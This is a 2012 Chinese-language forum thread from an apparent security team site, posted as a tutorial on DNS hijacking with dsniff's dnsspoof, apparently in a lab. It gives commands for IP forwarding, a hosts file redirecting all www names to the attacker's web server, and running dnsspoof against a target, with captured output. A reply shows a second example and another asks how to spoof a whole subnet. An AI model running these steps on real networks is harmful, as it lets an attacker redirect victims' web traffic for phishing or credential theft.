切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
37: 中间人攻击 dsniff 之 DNS劫持[复制链接]
发表于 2012-8-9 23:59:18 | 显示全部楼层 |!read_mode!
安装:
  1. root@Dis9Team:~# apt-get install dsniff
复制代码
arpspoof嗅探的不是源数据包,他已经加过了分析呈现给我们数据
首先开启端口转发:
  1. root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward
复制代码
查看网关:
  1. root@Dis9Team:~# netstat -r
  2. Kernel IP routing table
  3. Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
  4. 5.5.5.0         *               255.255.255.0   U         0 0          0 eth0
  5. link-local      *               255.255.0.0     U         0 0          0 eth0
  6. default         5.5.5.2         0.0.0.0         UG        0 0          0 eth0
  7. root@Dis9Team:~#
复制代码
编辑本地的APACHE主页:
  1. root@Dis9Team:~# nano /var/www/index.html
  2. root@Dis9Team:~# /etc/init.d/apache2 start
  3. * Starting web server apache2                                           [ OK ]
  4. root@Dis9Team:~#
复制代码
编辑欺骗的HOSTS 我的内容是:
  1. 5.5.5.136 www*
复制代码


吧全部WWW数据转向本地

启动欺骗: 目标 5.5.5.130

  1. root@Dis9Team:~# dnsspoof -f host host 5.5.5.130 and udp  port 53
  2. dnsspoof: listening on eth0 [host 5.5.5.130 and udp port 53]
  3. 5.5.5.130.1037 > 5.5.5.2.53:  48263+ A? www.dis9.com
  4. 5.5.5.130.1037 > 5.5.5.2.53:  16518+ A? www.baidu.com
  5. 5.5.5.130.1037 > 5.5.5.2.53:  62339+ A? www.google.com
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2012-8-10 00:25:43 | 显示全部楼层
查看help可以看出格式
  1. root@MetaSploit:~# dnsspoof --help
  2. dnsspoof: invalid option -- '-'
  3. Version: 2.4
  4. Usage: dnsspoof [-i interface] [-f hostsfile] [expression]
复制代码


如下例子
  1. root@MetaSploit:~# dnsspoof -f /etc/hosts  host 192.168.1.110 and udp port 53
  2. dnsspoof: listening on eth0 [host 192.168.1.110 and udp port 53]
  3. 192.168.1.110.1037 > 8.8.8.8.53:  4584+ A? www.qq.com
  4. 192.168.1.110.1037 > 8.8.8.8.53:  27879+ A? www.sina.com
复制代码



操千曲而后晓声,观千剑而后识器。
发表于 2012-8-10 00:35:30 | 显示全部楼层
那么如何欺骗整个网段的主机地址呐?
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 21:27

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部